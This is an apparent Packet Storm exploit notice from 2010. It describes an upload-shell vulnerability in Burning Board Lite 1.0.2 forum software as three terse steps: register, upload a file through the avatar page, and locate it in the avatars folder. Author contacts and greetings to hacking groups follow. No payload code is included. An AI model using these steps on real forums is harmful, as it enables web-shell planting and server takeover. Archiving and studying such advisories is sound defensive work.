Burning Board Lite 1.0.2 Shell Upload

2010-05-04T00:00:00
ID PACKETSTORM:89140
Type packetstorm
Reporter indoushka
Modified 2010-05-04T00:00:00

Description

                                        
                                            `========================================================================================   
| # Title : Burning Board Lite 1.0.2 Upload Shell Vulnerability   
| # Author : indoushka   
| # email : indoushka@hotmail.com   
| # Home : www.iqs3cur1ty.com   
| # Script : Powered by Burning Board Lite 1.0.2   
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)   
| # Bug : Upload Shell   
| # Download : http://www.shrta.com/files/1SKEYPMV/wbblite102pl3_ENG_.zip   
====================== Exploit By indoushka =================================  
# Exploit :   
  
1- http://127.0.0.1/wbblite/register.php (2 register)  
  
2- http://127.0.0.1/wbblite/usercp.php?action=avatars&sid=&page=1 (2 Upload)  
  
3- http://127.0.0.1/wbblite/images/avatars/ (2 F!nd it )  
  
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================  
Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca)  
all my friend :  
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)  
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/  
www.sa-hacker.com * www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N  
------------------------------------------------------------------------------------------------------------------------  
`